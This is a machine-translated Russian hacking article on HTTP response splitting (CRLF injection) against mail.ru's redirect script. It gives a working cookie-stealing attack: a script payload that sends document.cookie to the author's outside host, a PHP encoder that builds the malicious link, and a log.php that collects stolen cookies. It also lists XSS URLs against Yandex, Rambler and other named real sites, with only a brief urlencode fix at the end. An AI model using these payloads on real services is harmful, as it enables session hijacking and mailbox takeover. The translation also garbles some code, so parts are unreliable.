This page has been robot translated, sorry for typos if any. Original content here.

HTTP splitting vulnerability

This article discusses the practical application of a vulnerability known as HTTP splitting vulnerability.

Bazhny header () under the microscope

Wandering through the Internet, we often observe the url of the form http://anyhost.com/redirect.php?url=http://otherhost.com A simple-minded user, without a long thought, just clicks on it also pleases on otherhost.com. An inquisitive user submits the address of his hompagi to the url's location and also makes sure that the script is crooked.
In addition to the simple curious on the Internet live very curious users. They drive in a link in AccessDiver also begin to study the work of the script.

1. The essence of the bug.
2. Practical application.
3. The location of the prevalence of error.
4. Means of protection.

for tankers, I suggest that AccessDiver is “hakresky”, as is customary to express in a nation, an instrument. Download it allowed on the offsite project. At the time of this writing, the latest version of the utility was 4.173. The program is best known for its HTTP debuger function. You can use it by going to expert mode by also selecting the appropriate function in the Tools menu (F4 then Ctr + F9 - depending on the version, the keys could be changed). Then we will not emphasize the concern for its setting, any schoolboy can cope with a diver.

for experiments, we chose mail.ru , since this is the most famous postal service in runet, and the reader will be particularly interested to learn about the bug on this project;) Let's follow the link http://go.mail.ru/urltracker?url=http:/ /www.security-teams.net . We will transfer to the most chosen portal on computer security;). We add the site to the bookmarks and return to the mail. Write the link that interests us in the HTTP Address field, set the Mode to Get, click Connect.
Before us will appear HTTP headers returned by the server, approximately as in the screenshot:



Let us take care of the underlined line. Having encountered Location: headers, the browser unconditionally takes us to the specified url. Consequently, we can slip a link to the user, as if on a mail, but he will get nothing at all on the mail. All this is wonderful, but in practice nothing alienates.

Note that the lines in the header are separated by two characters 0Dh 0Ah . And what, if attributed to them at the end of the link? Let's see what the server will give us back to the objection to the request http://go.mail.ru/urltracker?url=null%0D%0AHacked_by:%20drmist :



How interesting. So we can force the server to produce almost any header. For example, change user cookies. But, again, this is still not as interesting as the fact that hesitates us ahead. Interestingly, the headers are separated from the body of the act by the sequence 0Dh 0Ah 0Dh 0Ah . Are we able to give full any page? Enter http://go.mail.ru/urltracker?url=% 0D% 0A% 0D% 0A <script> alert (document.cookie); </ script> <! - also look at:



All that is yellow is the text of the document itself. If JavaScript is enabled in the browser, then follow the link and we will see a message box with our cookies. In order to make the XSS attack, you need:
1) Create a page like <script> document.location = 'http://drmist.ru/log.php?'+document.cookie; </ script>
2) Translate it into url-encode using a script:

<? php
$ url = "http://go.mail.ru/urltracker?url=";
$ s = "<script> document.location = 'http: //drmist.ru/log.php?'";
$ s. = "+ document.cookie; </ script>";
$ res = "";
for ($ i = 0; $ i <strlen ($ s); $ i ++)
{
$ res. = "%";
$ t = ord ($ s [$ i]);
if ($ t <16)
$ res. = "0";
$ res. = dechex ($ t);
}

echo $ url. "% 0d% 0a% 0d% 0a". $ res;
?>

We get:
http://go.mail.ru/urltracker?url=%0d%0a%0d%0a%3c%73%63 ... etc. (**)

3) write the log.php script and also upload it to drmist.ru:
<? php
$ fid = fopen ("../ log.txt", "a");
fputs ($ fid, $ _SERVER ["QUERY_STRING"]. "\ r \ r \ r");
fclose ($ fid);
header ("Location: http://www.mail.ru");
?>

Now it is allowed to send the magic link (**) to purchase the victim’s cookies.
They are allowed to do a lot of useful things, for example, to get access to the mail, but about this some other time, we also distracted ourselves so much from the main topic.

Of course, it is not necessary to drive on the email that it is a great resource, shit, and it’s not from our sandbox either. It’s common for all people to make a mistake, but mail.ru admins make mistakes less and less often. True bugs still remain. , people are silent about them not because of greed, but because of the fear of inadequate reaction of the administration to their finding, which, according to statistics, owns the place. Fortunately, the presence of XSS does not guarantee access to the mailbox. I'm sure the bug will be covered. After 2 days at the latest. Vulnerable not only mail.ru. I strongly recommend to read:
http://yandex.ru/redir/?url=[XSS]
http://rambler.ru//click?_URL=[XSS]

Frankly, we were very surprised at what time I learned that such vulnerabilities were written on securitylab.ru 3 years ago (see CRLF implementation in the PHP header () function from September 10, 2002), but since we don’t I have heard more than once, then I considered the topic relevant. In addition, blah blah vryatli allowed to call in any way relevant to the presence of bugs on Yandex, Rambler also email.

Correct the error is not difficult. Let him eat the vulnerable script:

<?
if (! isset ($ url))
$ url = "http://www.mail.ru";

header ("Location: $ url");

?>

We make him invulnerable:

header ("Location:" .urlencode ($ url));

If the redirect is planned only within the site, then it is best to do this:

header ("Location: http://www.mail.ru/".urlencode($url));

Here perhaps also everything that we wanted to inform. Let me offer some more XSS:

http://talk.mail.ru/article.html?ID=31836089&page=1 "> <h1> XSS </ h1>
http://www.pochta.ru/?lng=en "<h1> XSS </ h1>